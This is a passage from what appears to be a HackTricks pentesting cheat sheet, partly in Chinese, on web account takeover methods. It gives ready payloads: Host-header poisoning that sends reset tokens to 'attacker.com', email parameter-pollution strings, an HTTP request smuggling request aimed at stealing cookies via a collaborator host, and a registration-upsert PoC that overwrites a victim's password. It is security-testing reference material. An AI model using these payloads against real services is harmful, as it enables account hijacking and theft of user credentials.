def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: 在两个会话中同时提交相同的有效 OTP；有时其中一个会话会变成已验证的攻击者账号，而受害者的流程也会成功。
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
- Attacker: registers a classic account with victim email and sets a password
- Victim: later signs up with SSO (same email)
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Attacker: creates account and holds a long‑lived session (don’t log out)
- Victim: recovers/sets password and uses the account
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
- Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
- Attacker: initiates email‑change to attacker mail and withholds confirmation
- Victim: recovers the account and starts using it
- Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
- Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
- Victim: signs up via classic route
- Service merges on email without checking `email_verified` or performing local verification

Practical tips

- 从 web/mobile bundle 中收集流程和端点。查找 classic signup、SSO linking、email/phone change 和 password reset 的端点。
- 编写真实的自动化脚本以在测试其他流程时保持会话存活。
- 对于 SSO 测试，搭建一个测试 OIDC provider，并为受害者地址签发包含 `email` claims 且 `email_verified=false` 的 token，以检查 RP 是否信任未验证的 IdP。
- 在任何 password reset 或 email change 之后，验证：
- 所有其他会话和 tokens 是否被作废，
- 待处理的 email/phone 更改能力是否被取消，
- 之前关联的 IdPs/emails/phones 是否被重新验证。

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. 攻击者需要使用自己的账号登录并进入 Change password 功能。
2. 启动 Burp Suite 并拦截请求
3. 将请求发送到 repeater 选项卡并编辑参数：User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

密码重置 token 应该是随机生成且每次都唯一。
尝试确定该 token 是否会过期或是否始终相同，因为在某些情况下生成算法较弱且可被猜测。以下变量可能被算法使用：

• 时间戳
• UserID
• 用户邮箱
• 名字和姓氏
• 出生日期
• 密码学
• 仅数字
• Small token sequence ( characters between [A-Z,a-z,0-9])
• token 重用
• token 过期日期

Leaking Password Reset Token

1. 使用 API/UI 触发针对特定邮箱（例如：test@mail.com）的密码重置请求。
2. 检查服务器响应并查找 resetToken
3. 然后在 URL 中使用该 token，例如 https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. 在系统上注册一个用户名与受害者用户名相同，但在用户名前后插入空格的账号，例如： "admin "
2. 使用你带空格的用户名请求密码重置。
3. 使用发送到你邮箱的 token 重置受害者密码。
4. 使用新密码登录受害者账号。

该平台 CTFd 曾易受此攻击。
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. 在应用或子域中找到 XSS，若 cookies 的作用域是父域：*.domain.com
2. Leak 当前 sessions cookie
3. 使用该 cookie 以用户身份认证

Account Takeover Via HTTP Request Smuggling

1. 使用 smuggler 检测 HTTP Request Smuggling 的类型（CL, TE, CL.TE）
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. 构造一个请求，覆盖 POST / HTTP/1.1，内容如下：
   GET http://something.burpcollaborator.net HTTP/1.1 X: 目标是将受害者 open redirect 到 burpcollab 并窃取他们的 cookies\
3. Final request could look like the following

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone reports exploiting this bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

通过 CSRF 劫持账户

1. 为 CSRF 创建 payload，例如：“HTML form with auto submit for a password change”
2. 发送该 payload

通过 JWT 劫持账户

JSON Web Token 可能被用于认证用户。

• 编辑 JWT，将 User ID / Email 更改为另一个用户
• 检查 JWT 签名是否弱

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

一些注册处理器在提供的 email 已存在时会执行 upsert。如果该 endpoint 接受只包含 email 和 password 的最小请求体且不强制验证所有权，那么发送受害者的 email 会在未认证的情况下覆盖其密码。

• 发现：从 bundled JS（或移动应用流量）收集 endpoint 名称，然后使用 ffuf/dirsearch 对类似 /parents/application/v4/admin/FUZZ 的基路径进行 fuzz。
• 方法提示：返回类似 “Only POST request is allowed.” 的 GET 通常表明正确的请求动词并且预期是 JSON body。
• 在真实环境中观察到的最小请求体:

{"email":"victim@example.com","password":"New@12345"}

示例 PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

影响：Full Account Takeover (ATO) without any reset token, OTP, or email verification.

参考资料

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。